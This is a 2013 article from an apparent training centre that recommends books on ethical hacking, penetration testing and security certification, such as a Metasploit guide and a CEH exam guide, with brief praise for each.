With an increase in the use of the Internet, concerns regarding its security have also grown manifold. This is particularly true in the case of highly confidential data. There have been past instances where the sites owned by even the most influential organizations have been hacked. This calls for designing systems which are impenetrable or identifying the weaknesses of an existing system. For this reason, there is now a high demand for computer experts who can conduct ethical hacking operations.
Most organizations seek to acquire ethical hacking services from full-time employees or consultants so as to ensure the security of their systems and information, thus making ethical hacking a highly lucrative profession.
Some of the best how-to-hack books that an aspiring ethical hacker must read are:

Hacking: The Art of Exploitation, 2nd Edition

This is one of the best books which will take you through the technicalities of areas like programming, shell code and exploitation. Regardless of whether you are a beginner or have very little hacking knowledge, this book will help you understand the complexities of the digital security tasks.
This excellent and well written book will make you learn all the clever stuff of getting access to a system. All in all, the best book to buy.

The Basics of Hacking and Penetration Testing: Ethical Hacking and Penetration Testing Made Easy (Syngress Basics Series)

The best thing about this book is that it covers all the basics of penetration testing and hacking, without assuming that the reader has any prior hacking knowledge. It provides a step-by-step journey of penetration testing, moving from Information Gathering to Scanning, Exploitation and finally, Report Writing.
Instead of dealing with individual concepts in-depth, this book will provide you with a wholesome picture of hacking.

Metasploit: The Penetration Tester's Guide

This book deals with penetration testing using the open source Metasploit Framework. It is suitable for readers who have no prior knowledge of Metasploit. The tutorial-like style of the book makes you learn things by doing them.
The end of the book provides a simulated version of an actual penetration test so as to give you a realistic experience.

BackTrack 5 Wireless Penetration Testing Beginner's Guide

Right from the beginning, this book gives you what you need, without wasting time in unnecessary justifications. Instead of explaining only theoretical concepts, the book consists of finely tuned and crystal clear tutorials. It provides a good mix of basics and high level knowledge and works cohesively with the reader.

CEH Certified Ethical Hacker All-in-One Exam Guide

This is undoubtedly one of the most well written books of all time. It provides crisp and clear writing with relevant examples along with a humorous touch to enliven the dry and mundane subject. The contents of the book are well organized, in a manner that is neither too chatty nor too dry. However, you require some basic networking background to derive the full benefit from this book.

CompTIA Security+: Get Certified Get Ahead: SY0-301 Study Guide

This certification book is easy to read, straightforward and explains some of the complex topics in an excellent manner. All you need to do in order to pass the test is to read the book and do the practice exercises.
In addition to this, the “Remember This” sections and the content headers highlight all the key topics that one must pay attention to. So, if you wish to get straight down to the study material without wasting time on esoteric gibberish, this is the book for you.

Although hacking may sound like an interesting area of study, when it comes to the application of the various concepts of penetration testing, it is easier said than done. In addition to having an educational background in the field of computer science, hackers must have an affinity for learning and acquiring new skills on an ongoing basis. Also, ethical hackers must possess out-of-the-box thinking so that they are able to come up with the maximum number of possible ways of designing and securing a computer system.

 

Copyright @ 2013 TECMIE iCENTER.
